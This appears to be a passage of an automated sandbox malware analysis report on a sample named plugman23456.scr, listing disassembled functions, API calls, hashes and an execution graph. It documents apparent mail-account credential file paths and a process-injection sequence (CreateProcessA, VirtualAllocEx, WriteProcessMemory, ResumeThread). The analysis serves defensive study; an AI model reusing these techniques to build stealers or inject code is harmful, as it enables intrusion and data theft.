                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: lstrlen$AttributesFilelstrcat
                          • String ID:
                          • API String ID: 3594823470-0
                          • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                          • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                          • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                          • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                          Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                          • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                          • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                          • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                          • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                          Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                          • _free.LIBCMT ref: 10005B2D
                          • _free.LIBCMT ref: 10005B55
                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                          • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                          • _abort.LIBCMT ref: 10005B74
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: ErrorLast$_free$_abort
                          • String ID:
                          • API String ID: 3160817290-0
                          • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                          • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                          • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                          • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                          Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                          • API String ID: 4036392271-1520055953
                          • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                          • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                          • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                          • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                          Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B6C
                          • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                          • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                          • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                          • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                          Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                          • _free.LIBCMT ref: 100071B8
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          • String ID:
                          • API String ID: 336800556-0
                          • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                          • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                          • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                          • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                          Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                          • _free.LIBCMT ref: 10005BB4
                          • _free.LIBCMT ref: 10005BDB
                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          • API String ID: 3170660625-0
                          • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                          • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                          • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                          • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                          Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                          • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                          • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: lstrlen$lstrcat
                          • String ID:
                          • API String ID: 493641738-0
                          • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                          • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                          • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                          • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                          Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 100091D0
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 100091E2
                          • _free.LIBCMT ref: 100091F4
                          • _free.LIBCMT ref: 10009206
                          • _free.LIBCMT ref: 10009218
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                          • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                          • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                          • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                          Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 1000536F
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 10005381
                          • _free.LIBCMT ref: 10005394
                          • _free.LIBCMT ref: 100053A5
                          • _free.LIBCMT ref: 100053B6
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                          • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                          • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                          • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                          Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\plugman23456.scr,00000104), ref: 10004C1D
                          • _free.LIBCMT ref: 10004CE8
                          • _free.LIBCMT ref: 10004CF2
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Users\user\AppData\Roaming\plugman23456.scr
                          • API String ID: 2506810119-4034744818
                          • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                          • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                          • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                          • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                          Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                          • __freea.LIBCMT ref: 100087D5
                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                          • String ID:
                          • API String ID: 2652629310-0
                          • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                          • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                          • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                          • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                          Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 1000655C
                            • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                            • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                            • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                          • String ID: *?$.
                          • API String ID: 2667617558-3972193922
                          • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                          • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                          • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                          • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                          Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: : $Se.
                          • API String ID: 4218353326-4089948878
                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                          • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                          • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                          Function 10001EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                            • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: Exception@8Throw$ExceptionRaise
                          • String ID: Unknown exception
                          • API String ID: 3476068407-410509341
                          • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                          • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                          • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                          • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                          Function 10007103 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: CommandLine
                          • String ID: @-m
                          • API String ID: 3253501508-2633110488
                          • Opcode ID: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                          • Instruction ID: 64725d3052c2c9ae7bbd7e52e8b3a5750bb25634a918b02f39acb7dc5bcd530d
                          • Opcode Fuzzy Hash: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                          • Instruction Fuzzy Hash: C0B00278C012209FE744AF7499DC2487FB0B758752B90D8AFD51AD2764D635C047EF20

                          Execution Graph

                          Execution Coverage:17%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:119
                          Total number of Limit Nodes:2
                          execution_graph 10835 46a01a2 10836 46a00d4 10835->10836 10837 46a00e3 10836->10837 10841 46a25be 10836->10841 10857 46a2550 10836->10857 10872 46a2560 10836->10872 10842 46a254c 10841->10842 10844 46a25c1 10841->10844 10843 46a259e 10842->10843 10887 46a2cc0 10842->10887 10891 46a2e63 10842->10891 10896 46a2a4e 10842->10896 10901 46a3069 10842->10901 10909 46a2bf4 10842->10909 10913 46a3231 10842->10913 10917 46a2b5e 10842->10917 10922 46a2bbe 10842->10922 10927 46a299e 10842->10927 10931 46a2a9a 10842->10931 10936 46a2c64 10842->10936 10941 46a2ae7 10842->10941 10843->10837 10844->10837 10858 46a257a 10857->10858 10859 46a3069 4 API calls 10858->10859 10860 46a2a4e 2 API calls 10858->10860 10861 46a2e63 2 API calls 10858->10861 10862 46a259e 10858->10862 10863 46a2cc0 2 API calls 10858->10863 10864 46a2ae7 2 API calls 10858->10864 10865 46a2c64 2 API calls 10858->10865 10866 46a2a9a 2 API calls 10858->10866 10867 46a299e 2 API calls 10858->10867 10868 46a2bbe 2 API calls 10858->10868 10869 46a2b5e 2 API calls 10858->10869 10870 46a3231 2 API calls 10858->10870 10871 46a2bf4 2 API calls 10858->10871 10859->10862 10860->10862 10861->10862 10862->10837 10863->10862 10864->10862 10865->10862 10866->10862 10867->10862 10868->10862 10869->10862 10870->10862 10871->10862 10873 46a257a 10872->10873 10874 46a3069 4 API calls 10873->10874 10875 46a2a4e 2 API calls 10873->10875 10876 46a259e 10873->10876 10877 46a2e63 2 API calls 10873->10877 10878 46a2cc0 2 API calls 10873->10878 10879 46a2ae7 2 API calls 10873->10879 10880 46a2c64 2 API calls 10873->10880 10881 46a2a9a 2 API calls 10873->10881 10882 46a299e 2 API calls 10873->10882 10883 46a2bbe 2 API calls 10873->10883 10884 46a2b5e 2 API calls 10873->10884 10885 46a3231 2 API calls 10873->10885 10886 46a2bf4 2 API calls 10873->10886 10874->10876 10875->10876 10876->10837 10877->10876 10878->10876 10879->10876 10880->10876 10881->10876 10882->10876 10883->10876 10884->10876 10885->10876 10886->10876 10946 17f571 10887->10946 10950 17f578 10887->10950 10888 46a2cde 10892 46a2e69 10891->10892 10954 17f800 10892->10954 10958 17f7f9 10892->10958 10893 46a2dc1 10893->10843 10897 46a2a54 10896->10897 10898 46a2ac7 10897->10898 10962 17f350 10897->10962 10966 17f358 10897->10966 10898->10843 10970 17f441 10901->10970 10974 17f448 10901->10974 10902 46a2ab3 10903 46a32d4 10902->10903 10907 17f350 ResumeThread 10902->10907 10908 17f358 ResumeThread 10902->10908 10903->10843 10904 46a2ac7 10907->10904 10908->10904 10978 17f698 10909->10978 10982 17f6a0 10909->10982 10910 46a2b2f 10910->10843 10915 17f6a0 WriteProcessMemory 10913->10915 10916 17f698 WriteProcessMemory 10913->10916 10914 46a3259 10915->10914 10916->10914 10918 46a2ab3 10917->10918 10920 17f350 ResumeThread 10918->10920 10921 17f358 ResumeThread 10918->10921 10919 46a2ac7 10920->10919 10921->10919 10923 46a2ba0 10922->10923 10924 46a2dc1 10923->10924 10925 17f800 ReadProcessMemory 10923->10925 10926 17f7f9 ReadProcessMemory 10923->10926 10924->10843 10925->10924 10926->10924 10986 17fa2c 10927->10986 10990 17fa38 10927->10990 10932 46a2ab2 10931->10932 10934 17f350 ResumeThread 10932->10934 10935 17f358 ResumeThread 10932->10935 10933 46a2ac7 10934->10933 10935->10933 10938 46a2c6a 10936->10938 10937 46a30eb 10939 17f6a0 WriteProcessMemory 10938->10939 10940 17f698 WriteProcessMemory 10938->10940 10939->10937 10940->10937 10942 46a2b01 10941->10942 10943 46a2dc1 10942->10943 10944 17f800 ReadProcessMemory 10942->10944 10945 17f7f9 ReadProcessMemory 10942->10945 10943->10843 10944->10943 10945->10943 10947 17f5bc VirtualAllocEx 10946->10947 10949 17f63a 10947->10949 10949->10888 10951 17f5bc VirtualAllocEx 10950->10951 10953 17f63a 10951->10953 10953->10888 10955 17f84c ReadProcessMemory 10954->10955 10957 17f8ca 10955->10957 10957->10893 10959 17f84c ReadProcessMemory 10958->10959 10961 17f8ca 10959->10961 10961->10893 10963 17f39c ResumeThread 10962->10963 10965 17f3ee 10963->10965 10965->10898 10967 17f39c ResumeThread 10966->10967 10969 17f3ee 10967->10969 10969->10898 10971 17f491 Wow64SetThreadContext 10970->10971 10973 17f50f 10971->10973 10973->10902 10975 17f491 Wow64SetThreadContext 10974->10975 10977 17f50f 10975->10977 10977->10902 10979 17f6ec WriteProcessMemory 10978->10979 10981 17f78b 10979->10981 10981->10910 10983 17f6ec WriteProcessMemory 10982->10983 10985 17f78b 10983->10985 10985->10910 10987 17fabf CreateProcessA 10986->10987 10989 17fd1d 10987->10989 10991 17fabf CreateProcessA 10990->10991 10993 17fd1d 10991->10993

                          Executed Functions

                          Function 046A2A4E Relevance: .1, Instructions: 112COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
